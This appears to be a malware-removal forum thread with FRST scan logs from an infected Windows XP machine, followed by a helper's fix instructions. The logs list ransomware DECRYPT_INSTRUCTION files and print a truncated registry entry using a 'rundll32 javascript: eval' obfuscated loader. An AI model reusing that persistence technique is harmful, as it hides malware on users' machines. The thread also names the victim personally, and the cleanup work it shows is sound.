2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2013-03-21 11:16 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application DataGoogle
2014-08-04 16:54 - 2012-08-23 14:07 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft Help
2014-08-04 16:54 - 2012-08-20 19:03 - 00001599 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.lnk
2014-08-04 16:54 - 2012-08-20 19:03 - 00000792 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Windows Media Player.lnk
2014-08-04 16:54 - 2012-08-20 19:03 - 00000000 ___RD () C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories
2014-08-01 14:04 - 2014-08-01 14:04 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-01 09:55 - 2014-08-01 09:55 - 00008198 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:55 - 2014-08-01 09:55 - 00004144 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:55 - 2014-08-01 09:55 - 00000274 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:51 - 2014-08-07 14:48 - 00262144 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-01 09:51 - 2014-08-01 10:14 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:43 - 2014-08-01 09:50 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-01 09:42 - 2014-08-01 09:50 - 00065536 _____ () C:\WINDOWS\system32\config\Microsof.evt
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-01 09:40 - 2014-08-01 09:42 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-01 09:40 - 2014-08-01 09:40 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-01 09:37 - 2014-08-01 09:37 - 00000000 ___HD () C:\82c2f8c
2014-07-24 20:44 - 2014-08-07 11:49 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\TEMP
2014-07-24 20:44 - 2014-07-24 21:06 - 00000000 ____D () C:\Program Files\Your Uninstaller 2008
2014-07-24 20:44 - 2014-07-24 20:44 - 00001810 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\1-Click Cleaning by Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000798 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\URSoft
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Your Uninstaller! 2008
2014-07-23 09:33 - 2014-07-24 22:59 - 00000759 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2014-07-22 22:50 - 2014-08-04 17:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Xihoh
2014-07-22 22:50 - 2014-07-23 17:47 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Epme
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-07 17:20 - 2014-08-06 16:26 - 00015839 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST.txt
2014-08-07 17:20 - 2012-08-20 19:10 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp
2014-08-07 17:19 - 2014-08-06 13:51 - 00000000 ____D () C:\FRST
2014-08-07 17:18 - 2012-08-20 19:07 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Temp
2014-08-07 17:18 - 2008-04-14 13:00 - 00013646 _____ () C:\WINDOWS\system32\wpa.dbl
2014-08-07 17:11 - 2014-08-04 17:04 - 00032340 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-07 17:11 - 2014-08-04 16:56 - 00105714 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-07 17:11 - 2012-08-22 11:16 - 00000384 ____H () C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job
2014-08-07 17:11 - 2012-08-20 19:07 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-08-07 16:26 - 2014-08-07 16:23 - 00000000 ___SD () C:\ComboFix
2014-08-07 14:48 - 2014-08-04 17:04 - 00000215 _____ () C:\WINDOWS\wiadebug.log
2014-08-07 14:48 - 2014-08-01 09:51 - 00262144 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-07 14:47 - 2012-08-20 19:10 - 00000098 ___SH () C:\Documents and Settings\Konstantine Trivizas\ntuser.ini
2014-08-07 14:31 - 2014-08-05 15:43 - 00002028 _____ () C:\Documents and Settings\All Users\Desktop\Ad-Aware Antivirus.lnk
2014-08-07 14:31 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Ad-Aware Browsing Protection
2014-08-07 14:29 - 2012-08-22 10:36 - 00011994 _____ () C:\WINDOWS\system32\nvModes.001
2014-08-07 14:29 - 2004-10-26 12:01 - 00017112 _____ () C:\WINDOWS\system32\nvapps.xml
2014-08-07 14:25 - 2012-08-20 19:10 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas
2014-08-07 14:24 - 2012-10-16 19:18 - 00000308 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-07 14:22 - 2013-02-21 00:09 - 00000910 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-07 14:22 - 2013-01-02 19:40 - 00000308 _____ () C:\WINDOWS\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-07 14:21 - 2014-08-04 17:04 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-08-07 14:20 - 2012-08-22 04:48 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978695_WM9$
2014-08-07 12:13 - 2014-08-07 12:13 - 00000000 _RSHD () C:\cmdcons
2014-08-07 12:13 - 2012-08-20 16:12 - 00000327 __RSH () C:\boot.ini
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\Qoobox
2014-08-07 12:03 - 2013-02-21 00:09 - 00000914 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-07 11:50 - 2012-08-23 12:38 - 00001038 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1004336348-1563985344-1343024091-1001UA.job
2014-08-07 11:49 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\TEMP
2014-08-07 11:42 - 2014-08-07 11:41 - 05568206 ____R (Swearware) C:\Documents and Settings\Konstantine Trivizas\Desktop\ComboFix.exe
2014-08-06 16:32 - 2014-08-06 16:31 - 00044049 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Addition.txt
2014-08-06 16:24 - 2014-08-04 17:11 - 00110296 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-08-06 15:51 - 2012-08-23 12:38 - 00000986 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1004336348-1563985344-1343024091-1001Core.job
2014-08-06 14:38 - 2014-08-06 14:37 - 01084928 _____ (Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
2014-08-05 18:29 - 2014-08-04 17:10 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-05 17:15 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Search Protection
2014-08-05 17:15 - 2012-08-22 04:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2695962$
2014-08-05 16:15 - 2014-08-05 16:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Lavasoft
2014-08-05 15:43 - 2014-08-05 15:43 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Ad-Aware Antivirus
2014-08-05 15:39 - 2014-08-05 12:39 - 00011803 _____ () C:\WINDOWS\setupapi.log
2014-08-05 15:38 - 2014-08-05 14:02 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-05 15:35 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\adawarebp
2014-08-05 15:34 - 2014-08-05 15:34 - 00000000 ____D () C:\Program Files\Toolbar Cleaner
2014-08-05 15:34 - 2014-08-05 15:33 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\adawaretb
2014-08-05 15:28 - 2014-08-05 15:28 - 00000000 ____D () C:\Program Files\Common Files\Lavasoft
2014-08-05 15:14 - 2014-08-05 15:14 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\LavasoftStatistics
2014-08-05 14:12 - 2013-01-02 19:40 - 00000316 _____ () C:\WINDOWS\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-05 13:41 - 2014-08-05 13:40 - 00001355 _____ () C:\WINDOWS\imsins.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00001083 _____ () C:\WINDOWS\netfxocm.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000425 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000342 _____ () C:\WINDOWS\ocmsn.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000311 _____ () C:\WINDOWS\tabletoc.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000309 _____ () C:\WINDOWS\msgsocm.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00006642 _____ () C:\WINDOWS\iis6.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00002822 _____ () C:\WINDOWS\tsoc.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00002058 _____ () C:\WINDOWS\comsetup.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00001248 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-05 13:41 - 2014-08-05 13:38 - 00006183 _____ () C:\WINDOWS\FaxSetup.log
2014-08-05 13:41 - 2014-08-05 13:38 - 00002956 _____ () C:\WINDOWS\ocgen.log
2014-08-05 13:41 - 2014-08-05 13:32 - 00008464 _____ () C:\WINDOWS\KB942288-v3.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00001878 _____ () C:\WINDOWS\msmqinst.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-08-05 13:37 - 2012-08-20 16:05 - 00000000 ____D () C:\WINDOWS\system32\mui
2014-08-05 13:36 - 2014-08-05 13:34 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB942288-v3$
2014-08-05 13:29 - 2014-08-05 13:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Lavasoft
2014-08-05 12:42 - 2012-08-22 04:52 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB971657$
2014-08-05 12:41 - 2012-08-22 16:05 - 00131072 _____ () C:\WINDOWS\system32\config\OAlerts.evt
2014-08-04 17:48 - 2008-04-14 13:00 - 00000582 _____ () C:\WINDOWS\win.ini
2014-08-04 17:48 - 2008-04-14 13:00 - 00000227 _____ () C:\WINDOWS\system.ini
2014-08-04 17:39 - 2012-08-22 05:04 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB959426$
2014-08-04 17:37 - 2012-08-22 16:43 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Adobe
2014-08-04 17:15 - 2014-07-22 22:50 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Xihoh
2014-08-04 17:11 - 2014-08-04 17:11 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-04 17:11 - 2014-08-04 17:11 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-04 17:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2014-08-04 17:04 - 2014-08-04 17:04 - 00000000 ____N () C:\WINDOWS\Sti_Trace.log
2014-08-04 17:02 - 2014-08-04 16:54 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2014-08-04 17:02 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Temp
2014-08-04 17:02 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google
2014-08-04 17:00 - 2014-08-04 16:59 - 00000000 ____D () C:\WINDOWS\pss
2014-08-04 16:56 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator
2014-08-04 16:55 - 2014-08-04 16:55 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache
2014-08-04 16:54 - 2014-08-04 16:54 - 00000000 ____D () C:\WINDOWS\CSC
2014-08-04 12:03 - 2012-08-24 10:26 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\My Documents\CAREER & INCOME
2014-08-04 11:10 - 2012-08-28 20:01 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\My Documents\AEOLUS HOSPITALITY
2014-08-01 14:04 - 2014-08-01 14:04 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-01 10:48 - 2013-02-04 20:06 - 00000000 ____D () C:\WINDOWS\Minidump
2014-08-01 10:14 - 2014-08-01 09:51 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-01 09:55 - 2014-08-01 09:55 - 00008198 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:55 - 2014-08-01 09:55 - 00004144 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:55 - 2014-08-01 09:55 - 00000274 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:55 - 2013-02-23 13:08 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Skype
2014-08-01 09:52 - 2012-08-22 12:28 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-01 09:50 - 2014-08-01 09:43 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-01 09:50 - 2014-08-01 09:42 - 00065536 _____ () C:\WINDOWS\system32\config\Microsof.evt
2014-08-01 09:49 - 2013-01-02 19:40 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\RealNetworks
2014-08-01 09:49 - 2012-10-16 19:16 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Real
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2013-02-23 13:08 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Skype
2014-08-01 09:47 - 2013-01-02 19:38 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\RealNetworks
2014-08-01 09:47 - 2012-08-20 18:59 - 00000000 ___RD () C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
2014-08-01 09:46 - 2012-10-16 19:11 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Real
2014-08-01 09:42 - 2014-08-01 09:40 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-01 09:42 - 2012-08-20 16:05 - 00000000 ____D () C:\WINDOWS\Help
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-01 09:40 - 2014-08-01 09:40 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-01 09:37 - 2014-08-01 09:37 - 00000000 ___HD () C:\82c2f8c
2014-07-30 18:30 - 2012-10-16 19:18 - 00000316 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-07-30 10:04 - 2012-09-03 19:24 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-07-24 23:21 - 2012-08-23 12:40 - 00002393 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Google Chrome.lnk
2014-07-24 23:10 - 2012-08-23 12:37 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google
2014-07-24 22:59 - 2014-07-23 09:33 - 00000759 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2014-07-24 21:06 - 2014-07-24 20:44 - 00000000 ____D () C:\Program Files\Your Uninstaller 2008
2014-07-24 21:03 - 2013-11-01 13:17 - 00000000 ___HD () C:\DrFoneForAndroid
2014-07-24 21:03 - 2012-08-23 11:06 - 00000000 ____D () C:\WINDOWS\system32\NtmsData
2014-07-24 20:44 - 2014-07-24 20:44 - 00001810 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\1-Click Cleaning by Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000798 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\URSoft
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Your Uninstaller! 2008
2014-07-23 17:47 - 2014-07-22 22:50 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Epme
 
Some content of TEMP:
====================
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\70253a8e-3c9f-4d22-bd36-b8d19f4791c5.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\71e80baa-31c7-4340-91d3-25d57739bca6.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\catchme.dll
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\f47520ff-a754-403a-a719-51c1c4b8b4fd.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\jre-7u65-windows-i586-iftw.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
==================== End Of Log ============================

Share this post


Link to post
Share on other sites

Nice, we're making some progress :)
 
 
FRST.gif Fix with Farbar Recovery Scan Tool
 

icon_exclaim.gif This fix was created for this user for use on that particular machine. icon_exclaim.gif
icon_exclaim.gif Running it on another one may cause damage and render the system unstable. icon_exclaim.gif

 
Download attached fixlist.txt file and save it to the Desktop:
 
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please attach it to your reply.

fixlist.txt

Share this post


Link to post
Share on other sites

here is the addition.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:5-08-2014
Ran by Konstantine Trivizas (administrator) on KONSTANT-8F5437 on 07-08-2014 17:19:29
Running from C:\Documents and Settings\Konstantine Trivizas\Desktop
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Safe Mode (minimal)
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 220 more characters). <==== ATTENTION!
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <===== ATTENTION
HKU\.DEFAULT\...\Run: [DWQueuedReporting] => C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [519584 2010-12-21] (Microsoft Corporation)
 
